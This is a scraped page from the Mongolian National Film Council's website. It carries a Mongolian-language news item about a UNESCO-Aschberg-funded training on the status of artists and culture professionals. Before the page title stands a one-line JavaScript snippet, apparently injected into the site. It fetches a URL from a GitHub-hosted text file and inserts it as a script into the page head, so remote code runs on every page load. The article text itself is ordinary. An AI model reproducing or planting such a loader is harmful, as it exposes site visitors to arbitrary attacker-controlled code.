;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); “УРЛАГ СОЁЛЫН МЭРГЭЖИЛТНҮҮДИЙН СТАТУСЫГ ДЭМЖИХ, ЧАДАВХЫГ БЭХЖҮҮЛЭХ СУРГАЛТ” ЭХЭЛЛЭЭ - Mongolian National Film Council

“УРЛАГ СОЁЛЫН МЭРГЭЖИЛТНҮҮДИЙН СТАТУСЫГ ДЭМЖИХ, ЧАДАВХЫГ БЭХЖҮҮЛЭХ СУРГАЛТ” ЭХЭЛЛЭЭ

“УРЛАГ СОЁЛЫН МЭРГЭЖИЛТНҮҮДИЙН СТАТУСЫГ ДЭМЖИХ, ЧАДАВХЫГ БЭХЖҮҮЛЭХ СУРГАЛТ” ЭХЭЛЛЭЭ
“УРЛАГ СОЁЛЫН МЭРГЭЖИЛТНҮҮДИЙН СТАТУСЫГ ДЭМЖИХ, ЧАДАВХЫГ
БЭХЖҮҮЛЭХ СУРГАЛТ” ЭХЭЛЛЭЭ
НҮБ-ийн Эдийн засаг нийгмийн зөвлөлийн удирдлага дор байдаг боловсрол, шинжлэх ухаан, соёлын салбарыг хөгжүүлэх зорилгоор 1945 оны 11 сард батлагдсан дүрмийн дагуу 1946 онд байгуулагдсан НҮБ-ын төрөлжсөн байгууллага болох ЮНЕСКО-оос дэлхийн олон орны засгийн газар, олон нийтийн байгууллагын соёл урлагийн чиглэлийн төслийг шалгаруулан мэргэжлийн туслалцаа үзүүлэхээс гадна төслийн логистикийг (хурал, зөвлөгөөн семинар зохион байгуулах, холбогдох материал бэлтгэл гэх мэт)-д зориулж 30.000 хүртэлх ам.долларын санхүүжилт олгодог билээ.
Соёлын яамны харьяа Кино урлагийн зөвлөл нь 2023 онд тус дэмжлэгийг авахаар шалгарсан ба өнөөдөр 04 дүгээр сарын 11-ны өдөр “Монгол улсын урлаг соёлын мэргэжилтнүүдийн статусыг дэмжих, чадавхыг бэхжүүлэх сургалт”-ын эхний өдрийн үйл ажиллагааг ЮНЕСКО-гийн Зүүн Бүсийн Азийн газартай хамтран амжилттай зохион байгууллаа.
Тус сургалтын эхний өдөр Өнөөдөр /04 дүгээр сарын 11/ “Дэлхийн үзэл баримтлал болон зарчимууд, олон улсын туршлагууд” сэдвийн дор явагдсан бөгөөд ЮНЕСКО-н 2005 оны Конвецийн шинжээч, гишүүн ХИРОКО ЦУБОЙ-ФРЭЙДМЭН 2005 оны Конвенц, 1980 оны Зөвлөмж, Ашбергийн хөтөлбөрийг танилцууллаа. Мөн “Даяаршсан соёлын эдийн засаг дахь үндэстэн дамнасан киноны бодлого ба уран бүтээлчдийн статус” сэдвээр Урлагийн түүхч, соёлын бодлого судлаач Ж.Бодьбаатар илтгэл танилцуулсан юм.
Энэхүү сургалт нь уран бүтээлч, соёл урлагийн мэргэжилтнүүдэд зориулсан ЮНЕСКО-Ашбергийн хөтөлбөрийн хүрээнд, Уран бүтээлчийн статусын талаарх 1980 оны зөвлөмж, мөн 2005 оны Соёлын илэрхийллийн олон талт байдлыг хамгаалах, дэмжих конвенцид тусгагдсан үндсэн үзэл баримтлал, зарчмуудын талаарх мэдлэгийг түгээх, чадавхийг бэхжүүлэх зорилготой юм.
Түүнчлэн өнөөгийн соёлын стандарт, практик хэрэглээг хангах зорилготой бөгөөд оролцогч талууд, уран бүтээлчдэд соёл урлагийн мэргэжилтнүүдийн статусыг сурталчлахад шаардлагатай мэдээллээр хангах, чадавхжуулахад чиглэсэн тус сургалтад Соёлын яамны УУББХЗГ-ын шинжээч Г.Ичинхорлоо, Кино урлагийн зөвлөлийн гишүүд болон удирдлагууд, Монголын Урлагийн Зөвлөлийн удирдлага, соёлын мэргэжилтнүүд, урлаг соёлын уран бүтээлчид оролцов.
Мөн сургалтын үеэр төрийн албан хаагчид, соёлын мэргэжилтнүүд, ИНБ-ын удирдлагуудын хооронд харилцан санал солилцох замаар уран бүтээлчдийн статусын талаарх мэдлэгийг дээшлүүлэх, урлагийн эрх чөлөөг дэмжих чиглэлээр амжилттай хэрэгжиж буй арга хэмжээг онцолж, соёлын бодлого журмыг боловсруулахад уран бүтээлчид болон иргэний нийгмийн оролцоог хэрхэн хангах талаар хэлэлцэв.
Дашрамд дурдахад тус санхүүжилтийг Монгол Улсаас гадна Аргентин, Кот-д’Ивуар, Чили, Жибути, Гана, Кени, Малави, Намиби, Нигер, Сенегал, Зимбабве түүнчлэн CECC-SICA-ийн гишүүн орнууд буюу Коста Рика, Белиз, Доминикан, Эль Сальвадор, Гватемал зэрэг улс орнуудын засгийн газар үзэл бодлоо чөлөөтэй уран сайхнаар илэрхийлэх эрх чөлөө, бүтээл туурвих, уран бүтээлчид болон соёл урлагийн ажилтнуудад дэмжлэг үзүүлэхэд чиглэсэн хууль тогтоомж, журам бодлого боловсруулахад техникийн туслалцаа үзүүлэхээр сонгогдсон билээ.